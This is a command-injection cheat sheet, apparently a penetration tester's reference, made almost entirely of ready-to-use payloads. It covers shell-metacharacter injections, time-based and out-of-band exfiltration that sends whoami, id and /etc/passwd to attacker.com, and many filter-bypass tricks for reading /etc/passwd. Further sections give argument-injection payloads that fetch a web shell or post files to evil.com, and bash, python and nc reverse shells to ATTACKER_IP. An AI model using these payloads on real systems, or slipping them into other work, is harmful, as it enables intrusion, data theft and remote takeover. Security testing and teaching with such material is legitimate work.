
Command Injection

Basic Operators (shell metacharacters - these only work when the input reaches a shell via system(), popen(), shell=True, backticks etc.; for argv-only sinks see Argument Injection below)

; ls                    # command separator
| ls                    # pipe
|| ls                   # OR (runs if first fails)
&& ls                   # AND (runs if first succeeds)
& ls                    # background (runs both)
`ls`                    # backtick substitution
$(ls)                   # command substitution
>(ls)                   # process substitution (bash/zsh only)
\nls                    # newline - must be an actual 0x0a byte, not the two characters backslash-n
%0als                   # URL-encoded newline

Blind Detection

# Time-based
; sleep 10
| sleep 10
& sleep 10
|| sleep 10
&& sleep 10
$(sleep 10)
`sleep 10`
; ping -c 10 127.0.0.1  # ~9-10 s on Linux; Windows ping uses -n 10

# OOB / DNS exfil (DNS labels are max 63 chars and cannot contain / + =, so keep base64 for HTTP paths and hex-encode, e.g. xxd -p, for DNS)
; curl attacker.com/$(whoami)
; nslookup $(whoami).attacker.oastify.com
|| curl attacker.com/$(cat /etc/passwd | base64 | head -1)
; wget http://attacker.com/$(id | base64)
& host $(whoami).attacker.com

# File write detection
; echo "proof" > /var/www/html/proof.txt

Filter Bypass

# Space bypass (brace expansion, $'...' and <() are bash/zsh features; system()/popen() run /bin/sh, which is dash on Debian/Ubuntu and lacks them)
{ls,-la}                 # brace expansion
ls$IFS-la               # $IFS = internal field separator (space/tab/newline)
ls${IFS}-la
ls%09-la                # tab character
cat</etc/passwd          # redirection instead of space (<> opens read-write and is denied on files you cannot write to; use plain <)
X=$'cat\x20/etc/passwd'&&$X

# Slash bypass
${PATH%%u*}             # yields / only when PATH starts with /usr (strips the longest suffix from the first u); check echo $PATH first
$(echo L2V0Yy9wYXNzd2Q= | base64 -d)   # base64 decode /etc/passwd

# Keyword bypass (if "cat" or "ls" is blocked)
c'a't /etc/passwd       # quotes in command name
c""at /etc/passwd       # empty quotes
c\at /etc/passwd        # backslash
/???/c?t /etc/passwd    # wildcards
/???/??t /???/p??s??    # full wildcard
cat$u /etc/passwd       # undefined variable ($u is empty)
$(printf '\x63\x61\x74') /etc/passwd  # hex printf
echo Y2F0IC9ldGMvcGFzc3dk | base64 -d | bash  # base64
{cat,/etc/passwd}       # brace expansion

# Bypass using environment variables
echo ${PATH:0:1}        # /
echo ${LS_COLORS:10:1}  # ; (LS_COLORS is normally only set in interactive shells, so expect it to be empty under a web server process)

# Bypass using $() and variable substitution
a=c;b=at;$a$b /etc/passwd   # split the blocked word across variables and concatenate them

# Newline bypass in URL
%0a ls
%0d%0a ls

# Semicolon bypass
%0a instead of ;
$'\x0a' (bash newline)

Windows-Specific

& dir
| dir
&& dir
|| dir
; is not a command separator in cmd.exe (use & instead); in PowerShell ; does separate commands

# Bypass
"w"h"o"a"m"i
who^ami                 # caret escape
set a=who&set b=ami&call %a%%b%
cmd /c "whoami"
powershell -c "whoami"

Common Injection Points

# User-agent sent to logging commands
# Filenames passed to processing tools (ffmpeg, imagemagick, exiftool)
# Email addresses in mail commands
# IP addresses in ping/traceroute features
# DNS lookup inputs
# PDF generators using command-line tools
# Git operations (repo URL, branch name)
# Archive extraction (filename injection in tar, zip)

Argument Injection

# Not command injection - instead, injecting arguments (flags) into a fixed command
# Works when user input is passed as its own argv entry (execve / subprocess list, no shell) and the app
# does not place "--" before it; a leading "--" or a value that cannot start with "-" defeats this class

# Git clone
git clone USER_INPUT
# Inject: --upload-pack='touch /tmp/pwned' https://github.com/x/x
# (upload-pack is only spawned for local-path and ssh transports, not https; point the target at a local path or ssh URL)
# Or: -c protocol.ext.allow=always ext::sh -c 'id>/tmp/pwned' %s% .

# curl
curl USER_INPUT
# Inject: -o /var/www/html/shell.php https://evil.com/shell.txt
# Or: --config /etc/passwd (read files via error)

# tar
tar czf backup.tar.gz USER_INPUT
# Inject: --checkpoint=1 --checkpoint-action=exec='id'

# find
find /dir -name USER_INPUT
# Inject: -exec id \;

# rsync
rsync USER_INPUT target:
# Inject: -e 'sh -c id' .

# ssh
ssh USER_INPUT
# Inject: -o ProxyCommand='curl evil.com/$(whoami)'

# wget
wget USER_INPUT
# Inject: --post-file=/etc/passwd https://evil.com/exfil

# sendmail
sendmail USER_INPUT
# Inject: -OQueueDirectory=/tmp -X/var/www/html/log.php

# ghostscript (pdf processing)
# PostScript embedded in a PDF can read/write files when gs runs without -dSAFER, or on versions with known -dSAFER bypasses; check the installed gs version

Escalation: Reverse Shell

; bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1   # /dev/tcp is a bash feature: if the sink is /bin/sh (dash), wrap it as bash -c '...'
; python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect(("ATTACKER_IP",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'
; rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc ATTACKER_IP 4444 >/tmp/f